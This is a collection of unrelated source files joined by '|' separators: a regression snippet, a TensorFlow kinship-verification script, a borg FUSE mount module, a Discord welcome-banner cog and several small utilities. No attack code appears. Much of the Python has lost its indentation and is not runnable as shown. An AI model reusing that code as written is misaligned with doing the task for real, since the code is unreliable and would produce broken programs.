y_train_pred = lm.predict(X_train_lm)
y_test_pred = lm.predict(X_test_lm)
# %%
plt.scatter(X_train, y_train)
plt.plot(X_train, y_train_pred, 'r')
plt.show()
# %%
plt.scatter(X_test, y_test)
plt.plot(X_test, y_test_pred, 'r')
plt.show()
# %%
print(r2_score(y_train, y_train_pred))
print(r2_score(y_test, y_test_pred))
# %%
|
#----------------------------------------------------------------
#- Linear Feature Learning for Kinship Verification in the Wild -
#----------------------------------------------------------------
#----------------------------------------------------------------
#- Find the best number of features -
#----------------------------------------------------------------
#- By: Abdellah SELLAM -
#- Hamid AZZOUNE -
#----------------------------------------------------------------
#- Created: 2018-04-08 -
#- Last update: 2018-07-12 -
#----------------------------------------------------------------
import os
import sys
import time
import numpy as np
import random as rd
import tensorflow as tf
from LoadData import LoadFoldGrayScale as LoadFold
from LoadData import SaveToCSV
# Seed the random generator with the current time, so that each execution
# produces different random values
rd.seed(time.time())
# KinFaceW dataset (KinFaceW-I or KinFaceW-II) from the command line
KinSet=sys.argv[2]
# KinFaceW kinship subset (fs, fd, ms or md) from the command line
KinShip=sys.argv[3]
# Number of LFL features from the command line
Q=int(sys.argv[1])
# Display the number of LFL features in the console
print("Q:",Q)
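# Expected invocation (an assumption inferred from the sys.argv indices above;
# the actual script file name is not shown here):
#   python find_best_q.py <Q> <KinSet> <KinShip>
#   e.g. python find_best_q.py 40 KinFaceW-I fs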
# Maximum number of Training Epochs
MAX_EPOCH=1000
# Number of Training Epochs between convergence checks
ValidCh=1
# Threshold of difference between last and current test loss (used to detect
# algorithm convergence: check if no further optimization is significant)
ValidTh=0.0001
# Number of training trials for this number of features: the program will run
# the training this many times and return the best performance
nTrial=1
# Best-threshold-search resolution: after learning the feature matrix with this
# number of features, we must judge its performance on test data in order to
# find the best number of features.
# The best feature matrix (best number of features) is the one that separates
# the two classes (positive/negative) best, i.e. a threshold on distances that
# best separates positive and negative pairs must be found, and then the
# accuracy of this threshold is reported as the performance of this number of
# features.
# The number of features with the best performance will be chosen
SearchT=1000
# Range of initial random values of the feature extraction matrix
MinRand=-0.01
MaxRand=+0.01
# Learning Rate for the Gradient Descent algorithm
LR=0.01
# used to detect convergence
MaxFail=5
#Number of Folds for K-Fold-Cross-Validation
nFold=5
# returns a random value in the predefined range for the matrix initial values
def RandomVal():
return rd.random()*(MaxRand-MinRand)+MinRand
# Returns the best threshold for this feature matrix
# D: List of distances of all pairs
# K: Kinship class (positive/negative) of all pairs (same order as D)
# N: Number of pairs (for D and K)
def ThreshPerf(D,K,N):
# Compute Minimum and Maximum distances
MinD=D[0] # Minimum
MaxD=D[0] # Maximum
for i in range(N):
if D[i]<MinD:
MinD=D[i]
if D[i]>MaxD:
MaxD=D[i]
# The algorithm will Compute the performances of 'SearchT' thresholds
# These 'SearchT' thresholds are values in the range [MinD .. MaxD]
    Th0=MinD # Lower bound of the best threshold
    Th1=MinD # Upper bound of the best threshold
# Since All threshold in the range [Th0 .. Th1] will have the same (best)
# performance, the algorithm will return the mean value of these two bounds
# as best threshold
Perf=0 # Holds the best performance
# Search a number (equal to 'SearchT') of thresholds
for T in range(SearchT):
# Pick a threshold between Minimum and Maximum distances
ThisTh=MinD+T*(MaxD-MinD)/SearchT
# Compute the Accuracy (performance) of this threshold
ThisPerf=0
for i in range(N):
if D[i]<ThisTh:
O=1
else:
O=0
if O==K[i]:
ThisPerf=ThisPerf+1
# See if the current performance is better than the last best
if ThisPerf>Perf:
# If this is a new best then
# 1. Update the best performance value
# 2. initialize Th0 and Th1 to be equal to the current threshold
Th0=ThisTh
Th1=ThisTh
Perf=ThisPerf
        # While the performance of the current threshold equals the best so far,
        # Th1 (the upper bound of the best threshold) keeps being updated with
        # greater threshold values
if ThisPerf==Perf:
Th1=ThisTh
# We will return the average of Th0 and Th1 (bounds of best threshold) as
    # the threshold with the best performance using this number of features
Th=(Th0+Th1)/2
return (Th,Perf)
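# Worked example (hypothetical values): with D=[0.1, 0.2, 0.9, 1.0] and
# K=[1, 1, 0, 0], every scanned threshold strictly between 0.2 and 0.9
# classifies all four pairs correctly, so Perf=4 and the returned threshold
# lies near the middle of that band (about 0.55).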
#Training interactive Display Variable
Text=""
# Prepare the file in which we hold results per number of features (Q)
# Each one of the four sub-sets of each one of the two kinship datasets will
# have its own file of results
# Extension CSV: opens with MS Excel, LibreOffice ...
csvr=open("./Results_"+KinShip+"_%d"%(Q)+".csv","w")
csvr.write("Fold;Trial;Epochs;Train Loss;Test Loss;Train Accuracy;Test Accuracy\n")
csvr.close()
# K-Cross Validation Results
# Item 1: Average Number of Iterations (Epochs)
# Item 2: Average Training Loss
# Item 3: Average Test Loss
# Item 4: Average Training Accuracy
# Item 5: Average Test Accuracy
Mean=[0.0,0.0,0.0,0.0,0.0]
for Fold in range(1,nFold+1):
# This Fold's best results over 'nTrial' number of trials
# Item 1: Number of Iterations (Epochs)
# Item 2: Training Loss
# Item 3: Test Loss
# Item 4: Training Accuracy
# Item 5: Test Accuracy
Best=[0.0,0.0,0.0,0.0,0.0]
# Loads the Train/Test pairs of this fold
# Inputs:
# KinSet: KinFaceW dataset (KinFaceW-I or KinFaceW-II)
# Kinship: KinFaceW subset (fs, fd, ms or md)
# Fold: K-Fold-Cross-Validation's fold
# Outputs:
# P0: Gray-Scale images of parents (Training data)
# C0: Gray-Scale images of children (Training data)
# K0: Kinship label (positive/negative) (Training data)
# P1: Gray-Scale images of parents (Test data)
# C1: Gray-Scale images of children (Test data)
# K1: Kinship label (positive/negative) (Test data)
(P0,C0,K0,P1,C1,K1)=LoadFold(KinSet,KinShip,Fold)
# N0: Number of train pairs
# a: 1
# M0: Number of gray-scale pixels in each image
(N0,a,M0)=P0.shape
# N1: Number of test pairs
# b: 1
# M1: Number of gray-scale pixels in each image
(N1,b,M1)=P1.shape
# Difference between gray-scale images of a pair (parent/child)
D0=P0-C0
D1=P1-C1
    # Try 'nTrial' times and keep the best results in the 'Best' list
for TR in range(nTrial):
# Initialize a Tensorflow session
ss=tf.Session()
# Make the initial random feature matrix
A0=[]
for i in range(M0):
Z=[]
for j in range(Q):
Z.append(RandomVal())
A0.append(Z)
# Use GPU for this Computation
with tf.device("/gpu:0"):
# A Tensor that holds the list of vectors of differences between
# gray-scale images of (parent,child) pairs [(P1-C1),(P2-C2),...,(Pn-Cn)]
D = tf.placeholder(tf.float32,shape=(None,1,None))
# A Tensor that holds kinship classes (positive/negative)
T = tf.placeholder(tf.float32,shape=(None,))
# A Tensor that holds the number of pairs
L = tf.placeholder(dtype=tf.int32)
# A Tensor Variable that contains the feature metric's matrix
A = tf.Variable(A0,dtype=tf.float32)
# A tensorflow's Variables' initializer
init = tf.global_variables_initializer()
# Gradient Descent's Loss function definition
# Tensorflow's While Loop continuation condition
def cond(i, others):
return i < L
# Tensorflow's While Loop body
def body(i, s):
# i^th pair's gray-scale-difference
x = D[i]
# i^th pair's KinShip class
t = T[i]
# multiply the gray-scale-difference by feature matrix A
# ~ Equivalent to P[i]*A-C[i]*A
T1 = tf.matmul(x,A)
# Element-wise square of x*A
T3 = tf.square(T1)
# Overall sum of squared differences after multiplication by
                # the feature matrix (equivalent to the squared Euclidean distance
                # between the images of a single pair that were transformed by matrix A)
d = tf.reduce_sum(T3)
# if this is a positive pair then
# add d to the loss value, distance between images of a
# positive pair should be small, so bigger distance means
# more loss
# if this is a negative pair then
# add 1/d to the loss value, distance between images of a
# negative pair should be big, so bigger distance means
# less loss
return i + 1, s+(1-t)/d+t*d
# Makes a Tensorflow's while loop for the loss function's definition
loop = tf.while_loop(cond, body, (tf.constant(0),tf.constant(0.0,shape=(),dtype=tf.float32)))
            # The loss is defined as the mean of the single-pair losses
loss = loop[1]/tf.cast(L, tf.float32)
# Creates a Tensorflow's Gradient Descent Optimizer
optimizer = tf.train.GradientDescentOptimizer(LR)
# Makes a Tensorflow's Gradient Descent Training process
train = optimizer.minimize(loss)
# Runs the Variable initializer on this session
ss.run(init)
# Training
# Last Epoch's loss on test data
LastLoss=ss.run(loss,{D: D1, T:K1, L:N1})
# Epochs' counter
E=0
# Stop boolean
stop=0
# Convergence counter
nFail=0
# While not reached Maximum number of Epochs and stop is false
while(E<MAX_EPOCH)and(stop==0):
# Runs a single training epoch
ss.run(train, {D: D0, T:K0, L:N0})
# Computes losses after this epoch
TrainLoss=ss.run(loss,{D: D0, T:K0, L:N0})
TestLoss=ss.run(loss,{D: D1, T:K1, L:N1})
# Difference between Last Epoch's loss and current loss on test data
Diff=LastLoss-TestLoss
            # Clear the console; this won't work properly in IDLE, so it is better
            # to run this script from cmd (a shell)
os.system("cls")
# Show old training results
print(Text)
# show this epoch's training progress
print('Q: %d Epoch: %d[%d]'%(Q,Fold,TR+1),E+1,'/',MAX_EPOCH,TrainLoss,":",TestLoss,"[",Diff,"]")
# Check for convergence, if the Difference between Last Epoch's
# loss and current loss on test data is less than a low value
# then stop the algorithm, because, it is of no use to go further
if (E+1)%ValidCh==0:
if Diff<ValidTh:
nFail=nFail+1
if nFail>=MaxFail:
stop=1
# Update last loss value
LastLoss=TestLoss
# Increment epoch's counter
E=E+1
# Results
# M: Learned feature metric's matrix
# L: Learning Loss
M, L = ss.run([A, loss], {D: D0, T:K0, L:N0})
# Search best threshold
# d0: distances after multiplication by the feature extraction matrix
# (Training data)
d0=[]
for i in range(N0):
Z=np.matmul(P0[i],M)
W=np.matmul(C0[i],M)
d0.append(np.linalg.norm(Z-W))
# d1: distances after multiplication by the feature extraction matrix
# (Test data)
d1=[]
for i in range(N1):
Z=np.matmul(P1[i],M)
W=np.matmul(C1[i],M)
d1.append(np.linalg.norm(Z-W))
# Results
# Th0: Best threshold using training data
# Perf0: Performance of the best threshold using training data
(Th0,Perf0)=ThreshPerf(d0,K0,N0)
# Th1: Best threshold using test data
# Perf1: Performance of the best threshold using test data
(Th1,Perf1)=ThreshPerf(d1,K1,N1)
# If the best test performance (in which we are interested) for this
# trial is better than the last one, then updated best results of this
# fold and save the feature-extraction matrix Learned from this fold
if(Perf1>Best[4]):
Best[0]=E
Best[1]=TrainLoss
Best[2]=TestLoss
Best[3]=Perf0
Best[4]=Perf1
if KinSet=="KinFaceW-I":
FileNameM="./M_"+KinShip+"-I_%d"%(Fold)+".csv"
else:
FileNameM="./M_"+KinShip+"-II_%d"%(Fold)+".csv"
SaveToCSV(M,FileNameM)
# Terminate the Tensorflow's session created earlier
ss.close()
# Output results to result's csv file
csvr=open("./Results_"+KinShip+"_%d"%(Q)+".csv","a")
csvr.write("%d;%d;%d;%f;%f;%f;%f\n"%(Fold+1,TR,E,TrainLoss,TestLoss,Perf0,Perf1))
csvr.close()
# Let the GPU rest for 20 seconds, just for the sake of hardware :p
time.sleep(20)
# K-Fold-Cross-Validation Results (Sum)
Mean[0]=Mean[0]+Best[0]
Mean[1]=Mean[1]+Best[1]
Mean[2]=Mean[2]+Best[2]
Mean[3]=Mean[3]+(Best[3]*100/N0)
Mean[4]=Mean[4]+(Best[4]*100/N1)
# K-Fold-Cross-Validation Results (Average)
for i in range(5):
Mean[i]=Mean[i]/nFold
# Append a new line to the interactive training display variable
# Why this technique?
# If you run this script multiple times from a shell batch file with different
# numbers of features (as I do), the program should always show in the console
# the final results of older executions (other numbers of features), together
# with the results of the last iteration of the current execution (current
# number of features).
# The variable 'Text' holds the older executions' results, so they can be
# printed before the current results
Text=Text+"%4d : %4d : %.03f : %.03f : %.01f%% : %.01f%%\n"%(Q,Mean[0],Mean[1],Mean[2],Mean[3],Mean[4])
Line="%d;%f;%f;%f;%f;%f\n"%(Q,Mean[0],Mean[1],Mean[2],Mean[3],Mean[4])
csvr=open("./Results.csv","a")
csvr.write(Line)
csvr.close()
print(Text)
|
import errno
import io
import os
import stat
import tempfile
import time
from collections import defaultdict
from signal import SIGINT
from distutils.version import LooseVersion
from zlib import adler32
import llfuse
import msgpack
from .logger import create_logger
logger = create_logger()
from .archive import Archive
from .helpers import daemonize
from .item import Item
from .lrucache import LRUCache
# Does this version of llfuse support ns precision?
have_fuse_xtime_ns = hasattr(llfuse.EntryAttributes, 'st_mtime_ns')
fuse_version = LooseVersion(getattr(llfuse, '__version__', '0.1'))
if fuse_version >= '0.42':
def fuse_main():
return llfuse.main(workers=1)
else:
def fuse_main():
llfuse.main(single=True)
return None
class ItemCache:
def __init__(self):
self.fd = tempfile.TemporaryFile(prefix='borg-tmp')
self.offset = 1000000
def add(self, item):
pos = self.fd.seek(0, io.SEEK_END)
self.fd.write(msgpack.packb(item.as_dict()))
return pos + self.offset
def get(self, inode):
offset = inode - self.offset
if offset < 0:
raise ValueError('ItemCache.get() called with an invalid inode number')
self.fd.seek(offset, io.SEEK_SET)
item = next(msgpack.Unpacker(self.fd, read_size=1024))
return Item(internal_dict=item)
class FuseOperations(llfuse.Operations):
"""Export archive as a fuse filesystem
"""
# mount options
allow_damaged_files = False
versions = False
def __init__(self, key, repository, manifest, args, cached_repo):
super().__init__()
self.repository_uncached = repository
self.repository = cached_repo
self.args = args
self.manifest = manifest
self.key = key
self._inode_count = 0
self.items = {}
self.parent = {}
self.contents = defaultdict(dict)
self.default_dir = Item(mode=0o40755, mtime=int(time.time() * 1e9), uid=os.getuid(), gid=os.getgid())
self.pending_archives = {}
self.accounted_chunks = {}
self.cache = ItemCache()
data_cache_capacity = int(os.environ.get('BORG_MOUNT_DATA_CACHE_ENTRIES', os.cpu_count() or 1))
logger.debug('mount data cache capacity: %d chunks', data_cache_capacity)
self.data_cache = LRUCache(capacity=data_cache_capacity, dispose=lambda _: None)
def _create_filesystem(self):
self._create_dir(parent=1) # first call, create root dir (inode == 1)
if self.args.location.archive:
archive = Archive(self.repository_uncached, self.key, self.manifest, self.args.location.archive,
consider_part_files=self.args.consider_part_files)
self.process_archive(archive)
else:
archive_names = (x.name for x in self.manifest.archives.list_considering(self.args))
for name in archive_names:
archive = Archive(self.repository_uncached, self.key, self.manifest, name,
consider_part_files=self.args.consider_part_files)
if self.versions:
# process archives immediately
self.process_archive(archive)
else:
# lazy load archives, create archive placeholder inode
archive_inode = self._create_dir(parent=1)
self.contents[1][os.fsencode(name)] = archive_inode
self.pending_archives[archive_inode] = archive
def mount(self, mountpoint, mount_options, foreground=False):
"""Mount filesystem on *mountpoint* with *mount_options*."""
options = ['fsname=borgfs', 'ro']
if mount_options:
options.extend(mount_options.split(','))
try:
options.remove('allow_damaged_files')
self.allow_damaged_files = True
except ValueError:
pass
try:
options.remove('versions')
self.versions = True
except ValueError:
pass
self._create_filesystem()
llfuse.init(self, mountpoint, options)
if not foreground:
daemonize()
# If the file system crashes, we do not want to umount because in that
# case the mountpoint suddenly appears to become empty. This can have
# nasty consequences, imagine the user has e.g. an active rsync mirror
# job - seeing the mountpoint empty, rsync would delete everything in the
# mirror.
umount = False
try:
signal = fuse_main()
# no crash and no signal (or it's ^C and we're in the foreground) -> umount request
umount = (signal is None or (signal == SIGINT and foreground))
finally:
llfuse.close(umount)
def _create_dir(self, parent):
"""Create directory
"""
ino = self.allocate_inode()
self.items[ino] = self.default_dir
self.parent[ino] = parent
return ino
def process_archive(self, archive, prefix=[]):
"""Build fuse inode hierarchy from archive metadata
"""
self.file_versions = {} # for versions mode: original path -> version
unpacker = msgpack.Unpacker()
for key, chunk in zip(archive.metadata.items, self.repository.get_many(archive.metadata.items)):
_, data = self.key.decrypt(key, chunk)
unpacker.feed(data)
for item in unpacker:
item = Item(internal_dict=item)
path = os.fsencode(os.path.normpath(item.path))
is_dir = stat.S_ISDIR(item.mode)
if is_dir:
try:
# This can happen if an archive was created with a command line like
# $ borg create ... dir1/file dir1
# In this case the code below will have created a default_dir inode for dir1 already.
inode = self._find_inode(path, prefix)
except KeyError:
pass
else:
self.items[inode] = item
continue
segments = prefix + path.split(b'/')
parent = 1
for segment in segments[:-1]:
parent = self.process_inner(segment, parent)
self.process_leaf(segments[-1], item, parent, prefix, is_dir)
def process_leaf(self, name, item, parent, prefix, is_dir):
def file_version(item):
if 'chunks' in item:
ident = 0
for chunkid, _, _ in item.chunks:
ident = adler32(chunkid, ident)
return ident
def make_versioned_name(name, version, add_dir=False):
if add_dir:
# add intermediate directory with same name as filename
path_fname = name.rsplit(b'/', 1)
name += b'/' + path_fname[-1]
return name + os.fsencode('.%08x' % version)
if self.versions and not is_dir:
parent = self.process_inner(name, parent)
version = file_version(item)
if version is not None:
# regular file, with contents - maybe a hardlink master
name = make_versioned_name(name, version)
path = os.fsencode(os.path.normpath(item.path))
self.file_versions[path] = version
path = item.path
        del item.path # save some space
if 'source' in item and stat.S_ISREG(item.mode):
# a hardlink, no contents, <source> is the hardlink master
source = os.fsencode(os.path.normpath(item.source))
if self.versions:
# adjust source name with version
version = self.file_versions[source]
source = make_versioned_name(source, version, add_dir=True)
name = make_versioned_name(name, version)
try:
inode = self._find_inode(source, prefix)
except KeyError:
logger.warning('Skipping broken hard link: %s -> %s', path, item.source)
return
item = self.cache.get(inode)
item.nlink = item.get('nlink', 1) + 1
self.items[inode] = item
else:
inode = self.cache.add(item)
self.parent[inode] = parent
if name:
self.contents[parent][name] = inode
def process_inner(self, name, parent_inode):
dir = self.contents[parent_inode]
if name in dir:
inode = dir[name]
else:
inode = self._create_dir(parent_inode)
if name:
dir[name] = inode
return inode
def allocate_inode(self):
self._inode_count += 1
return self._inode_count
def statfs(self, ctx=None):
stat_ = llfuse.StatvfsData()
stat_.f_bsize = 512
stat_.f_frsize = 512
stat_.f_blocks = 0
stat_.f_bfree = 0
stat_.f_bavail = 0
stat_.f_files = 0
stat_.f_ffree = 0
stat_.f_favail = 0
return stat_
def get_item(self, inode):
try:
return self.items[inode]
except KeyError:
return self.cache.get(inode)
def _find_inode(self, path, prefix=[]):
segments = prefix + path.split(b'/')
inode = 1
for segment in segments:
inode = self.contents[inode][segment]
return inode
def getattr(self, inode, ctx=None):
item = self.get_item(inode)
size = 0
dsize = 0
if 'chunks' in item:
for key, chunksize, _ in item.chunks:
size += chunksize
if self.accounted_chunks.get(key, inode) == inode:
self.accounted_chunks[key] = inode
dsize += chunksize
entry = llfuse.EntryAttributes()
entry.st_ino = inode
entry.generation = 0
entry.entry_timeout = 300
entry.attr_timeout = 300
entry.st_mode = item.mode
entry.st_nlink = item.get('nlink', 1)
entry.st_uid = item.uid
entry.st_gid = item.gid
entry.st_rdev = item.get('rdev', 0)
entry.st_size = size
entry.st_blksize = 512
entry.st_blocks = dsize / 512
# note: older archives only have mtime (not atime nor ctime)
mtime_ns = item.mtime
if have_fuse_xtime_ns:
entry.st_mtime_ns = mtime_ns
entry.st_atime_ns = item.get('atime', mtime_ns)
entry.st_ctime_ns = item.get('ctime', mtime_ns)
else:
entry.st_mtime = mtime_ns / 1e9
entry.st_atime = item.get('atime', mtime_ns) / 1e9
entry.st_ctime = item.get('ctime', mtime_ns) / 1e9
return entry
def listxattr(self, inode, ctx=None):
item = self.get_item(inode)
return item.get('xattrs', {}).keys()
def getxattr(self, inode, name, ctx=None):
item = self.get_item(inode)
try:
return item.get('xattrs', {})[name]
except KeyError:
raise llfuse.FUSEError(llfuse.ENOATTR) from None
def _load_pending_archive(self, inode):
# Check if this is an archive we need to load
archive = self.pending_archives.pop(inode, None)
if archive:
self.process_archive(archive, [os.fsencode(archive.name)])
def lookup(self, parent_inode, name, ctx=None):
self._load_pending_archive(parent_inode)
if name == b'.':
inode = parent_inode
elif name == b'..':
inode = self.parent[parent_inode]
else:
inode = self.contents[parent_inode].get(name)
if not inode:
raise llfuse.FUSEError(errno.ENOENT)
return self.getattr(inode)
def open(self, inode, flags, ctx=None):
if not self.allow_damaged_files:
item = self.get_item(inode)
if 'chunks_healthy' in item:
# Processed archive items don't carry the path anymore; for converting the inode
# to the path we'd either have to store the inverse of the current structure,
# or search the entire archive. So we just don't print it. It's easy to correlate anyway.
logger.warning('File has damaged (all-zero) chunks. Try running borg check --repair. '
'Mount with allow_damaged_files to read damaged files.')
raise llfuse.FUSEError(errno.EIO)
return inode
def opendir(self, inode, ctx=None):
self._load_pending_archive(inode)
return inode
def read(self, fh, offset, size):
parts = []
item = self.get_item(fh)
for id, s, csize in item.chunks:
if s < offset:
offset -= s
continue
n = min(size, s - offset)
if id in self.data_cache:
data = self.data_cache[id]
if offset + n == len(data):
# evict fully read chunk from cache
del self.data_cache[id]
else:
_, data = self.key.decrypt(id, self.repository.get(id))
if offset + n < len(data):
# chunk was only partially read, cache it
self.data_cache[id] = data
parts.append(data[offset:offset + n])
offset = 0
size -= n
if not size:
break
return b''.join(parts)
def readdir(self, fh, off):
entries = [(b'.', fh), (b'..', self.parent[fh])]
entries.extend(self.contents[fh].items())
for i, (name, inode) in enumerate(entries[off:], off):
yield name, self.getattr(inode), i + 1
def readlink(self, inode, ctx=None):
item = self.get_item(inode)
return os.fsencode(item.source)
|
from ape import plugins
from .providers import EthereumNetworkConfig, EthereumProvider, NetworkConfig
@plugins.register(plugins.Config)
def config_class():
return NetworkConfig
@plugins.register(plugins.ProviderPlugin)
def providers():
for network_name in EthereumNetworkConfig().serialize():
yield "ethereum", network_name, EthereumProvider
|
#!/usr/bin/env python
import asyncio
import websockets
import datetime
import random
class SocketClient:
    def __init__(self, uri='ws://localhost:9000'):
        self.uri = uri
        self.socket = None
    async def connect(self):
        # websockets.connect() must be awaited to obtain a usable connection
        self.socket = await websockets.connect(self.uri)
    async def send(self, message):
        if self.socket is None:
            await self.connect()
        await self.socket.send(message)
async def main():
    client = SocketClient()
    await client.send("moi")
asyncio.get_event_loop().run_until_complete(main())
# async def hello():
# async with websockets.connect('ws://localhost:9000') as websocket:
# while True:
# now = datetime.datetime.utcnow().isoformat() + 'Z'
# await websocket.send(now)
# await asyncio.sleep(random.random() * 3)
# asyncio.get_event_loop().run_until_complete(hello())
# print("Mock bot client started, sending timestamps")
# asyncio.get_event_loop().run_forever()
|
# -*- coding: utf-8 -*-
"""
File Name: maxProduct
Author : jing
Date: 2020/3/25
https://leetcode-cn.com/problems/maximum-product-subarray/
Maximum Product Subarray
"""
class Solution:
    # Because a negative times a negative gives a positive, and the two negatives
    # may be far apart, we need to track both the maximum and the minimum product
    # ending at each position
def maxProduct(self, nums) -> int:
if nums is None or len(nums) == 0:
return None
elif len(nums) == 1:
return nums[0]
max_dp = nums[:]
min_dp = nums[:]
max_res = max_dp[0]
for i in range(1, len(nums)):
max_dp[i] = max(max_dp[i-1] * nums[i], nums[i], min_dp[i-1] * nums[i])
min_dp[i] = min(min_dp[i-1] * nums[i], nums[i], max_dp[i-1] * nums[i])
max_res = max(max_dp[i], max_res)
return max_res
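# A small self-check (not part of the original LeetCode submission; expected
# values follow directly from the problem definition):
if __name__ == '__main__':
    solver = Solution()
    assert solver.maxProduct([2, 3, -2, 4]) == 6      # best subarray: [2, 3]
    assert solver.maxProduct([-2, 0, -1]) == 0        # best subarray: [0]
    assert solver.maxProduct([-2, 3, -4]) == 24       # the two negatives multiply out
    print("all maxProduct checks passed")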
|
# -*- coding: utf-8 -*-
# @Date : 2022/4/19 09:41
# @Author : WangYihao
# @File : utils.py
import torch
def adaptive_softmax(scores, normalize):
negative_mask = scores < 0
scores = scores.__abs__().float()
if normalize:
scores /= scores.max()
weights = torch.softmax(scores, dim=0)
weights[negative_mask] *= -1
return weights
def zoom_to_01(x):
return (x - x.min()) / (x.max() - x.min())
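# A minimal usage sketch (illustrative values only, not from the original file):
if __name__ == '__main__':
    s = torch.tensor([2.0, -1.0, 0.5])
    w = adaptive_softmax(s, normalize=True)
    print(w)              # softmax over |scores|, with the sign of negative inputs restored
    print(zoom_to_01(s))  # tensor([1.0000, 0.0000, 0.5000])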
|
from . import detector
from . import scanner
from . import printer
|
from torchvision.transforms import *
from .fancy_pca import *
from .convert import *
from .autoaugment_operators import *
from .autoaugment_policies import *
from .normalize import *
from .common import *
from .resize_before_crop import *
def get(name, *args, **kwargs):
    # The transform classes are brought in by the star imports above, so look them
    # up in the module namespace; locals() inside this function never contains them.
    if name not in globals():
        raise RuntimeError('transform [{}] not found in runner.transforms.image'.format(name))
    TransformClass = globals()[name]
    transform = TransformClass(*args, **kwargs)
    return transform
|
## Copyright 2020 Google LLC
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## https://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Compatibility-export for `closure_grpc_web_library`."""
load("//bazel/private/rules:closure_grpc_web_library.bzl", _closure_grpc_web_library = "closure_grpc_web_library")
# TODO(yannic): Deprecate and remove.
closure_grpc_web_library = _closure_grpc_web_library
|
from .dataset import BaseDataset
from .dataset import FederatedDataset
from .dataloader import FederatedDataLoader
|
import io
import discord
import PIL as pillow
from PIL import Image, ImageDraw, ImageFont  # load the submodules so pillow.Image/ImageDraw/ImageFont resolve below
from discord.ext import commands
from utilities import utils
from utilities import checks
from utilities import converters
from utilities import decorators
HOME = 805638877762420786 # Support Server
WELCOME = 847612677013766164 # Welcome channel
GENERAL = 805638877762420789 # Chatting channel
TESTING = 871900448955727902 # Testing channel
ANNOUNCE = 852361774871216150 # Announcement channel
def setup(bot):
bot.add_cog(Home(bot))
class Home(commands.Cog):
"""
Server specific cog.
"""
def __init__(self, bot):
self.bot = bot
@property
def home(self):
return self.bot.get_guild(HOME)
@property
def welcomer(self):
return self.bot.get_channel(WELCOME)
@property
def booster(self):
return self.bot.get_channel(TESTING)
#####################
## Event Listeners ##
#####################
@commands.Cog.listener()
@decorators.wait_until_ready()
@decorators.event_check(lambda s, m: m.guild.id == HOME)
async def on_member_join(self, member):
if self.bot.tester is False:
await self.welcome(member)
async def welcome(self, member):
byteav = await member.display_avatar.with_size(128).read()
buffer = await self.bot.loop.run_in_executor(
None, self.create_welcome_image, byteav, member
)
dfile = discord.File(fp=buffer, filename="welcome.png")
embed = discord.Embed(
title=f"WELCOME TO {member.guild.name.upper()}!",
description=f"> Click [here]({self.bot.oauth}) to invite {self.bot.user.mention}\n"
f"> Click [here](https://discord.com/channels/{HOME}/{ANNOUNCE}) for announcements.\n"
f"> Click [here](https://discord.com/channels/{HOME}/{GENERAL}) to start chatting.\n"
f"> Click [here](https://discord.com/channels/{HOME}/{TESTING}) to run commands.\n",
timestamp=discord.utils.utcnow(),
color=self.bot.constants.embed,
url=self.bot.oauth,
)
embed.set_thumbnail(url=utils.get_icon(member.guild))
embed.set_image(url="attachment://welcome.png")
embed.set_footer(text=f"Server Population: {member.guild.member_count} ")
await self.welcomer.send(f"{member.mention}", file=dfile, embed=embed)
def create_welcome_image(self, bytes_avatar, member):
banner = pillow.Image.open("./data/assets/banner.png").resize((725, 225))
blue = pillow.Image.open("./data/assets/blue.png")
mask = pillow.Image.open("./data/assets/avatar_mask.png")
avatar = pillow.Image.open(io.BytesIO(bytes_avatar))
try:
composite = pillow.Image.composite(avatar, mask, mask)
except ValueError: # Sometimes the avatar isn't resized properly
avatar = avatar.resize((128, 128))
composite = pillow.Image.composite(avatar, mask, mask)
blue.paste(im=composite, box=(0, 0), mask=composite)
banner.paste(im=blue, box=(40, 45), mask=blue.split()[3])
text = "{}\nWelcome to {}".format(str(member), member.guild.name)
draw = pillow.ImageDraw.Draw(banner)
font = pillow.ImageFont.truetype(
"./data/assets/FreeSansBold.ttf", 40, encoding="utf-8"
)
draw.text((190, 60), text, (211, 211, 211), font=font)
buffer = io.BytesIO()
banner.save(buffer, "png") # 'save' function for PIL
buffer.seek(0)
return buffer
async def thank_booster(self, member):
byteav = await member.display_avatar.with_size(128).read()
buffer = await self.bot.loop.run_in_executor(
None, self.create_booster_image, byteav, member
)
dfile = discord.File(fp=buffer, filename="booster.png")
embed = discord.Embed(
title=f"Thank you for boosting!",
# description=f"> Click [here]({self.bot.oauth}) to invite {self.bot.user.mention}\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{ANNOUNCE}) for announcements.\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{GENERAL}) to start chatting.\n"
# f"> Click [here](https://discord.com/channels/{HOME}/{TESTING}) to run commands.\n",
timestamp=discord.utils.utcnow(),
color=self.bot.constants.embed,
url=self.bot.oauth,
)
embed.set_thumbnail(url=utils.get_icon(member.guild))
embed.set_image(url="attachment://booster.png")
embed.set_footer(
text=f"Server Boosts: {member.guild.premium_subscription_count} "
)
await self.booster.send(f"{member.mention}", file=dfile, embed=embed)
def create_booster_image(self, bytes_avatar, member):
banner = pillow.Image.open("./data/assets/roo.png") # .resize((725, 225))
blue = pillow.Image.open("./data/assets/blue.png")
mask = pillow.Image.open("./data/assets/avatar_mask.png")
avatar = pillow.Image.open(io.BytesIO(bytes_avatar))
try:
composite = pillow.Image.composite(avatar, mask, mask)
except ValueError: # Sometimes the avatar isn't resized properly
avatar = avatar.resize((128, 128))
composite = pillow.Image.composite(avatar, mask, mask)
blue.paste(im=composite, box=(0, 0), mask=composite)
banner.paste(im=blue, box=(40, 45), mask=blue.split()[3])
# text = "{}\nWelcome to {}".format(str(member), member.guild.name)
# draw = pillow.ImageDraw.Draw(banner)
# font = pillow.ImageFont.truetype(
# "./data/assets/FreeSansBold.ttf", 40, encoding="utf-8"
# )
# draw.text((190, 60), text, (211, 211, 211), font=font)
buffer = io.BytesIO()
banner.save(buffer, "png") # 'save' function for PIL
buffer.seek(0)
return buffer
@decorators.command(hidden=True, brief="Test the welcome", name="welcome")
@decorators.is_home(HOME)
@checks.has_perms(manage_guild=True)
@checks.bot_has_perms(embed_links=True, attach_files=True)
async def _welcome(self, ctx, user: converters.DiscordMember = None):
user = user or ctx.author
await self.welcome(user)
@decorators.command(hidden=True, brief="Test the boost", name="booster")
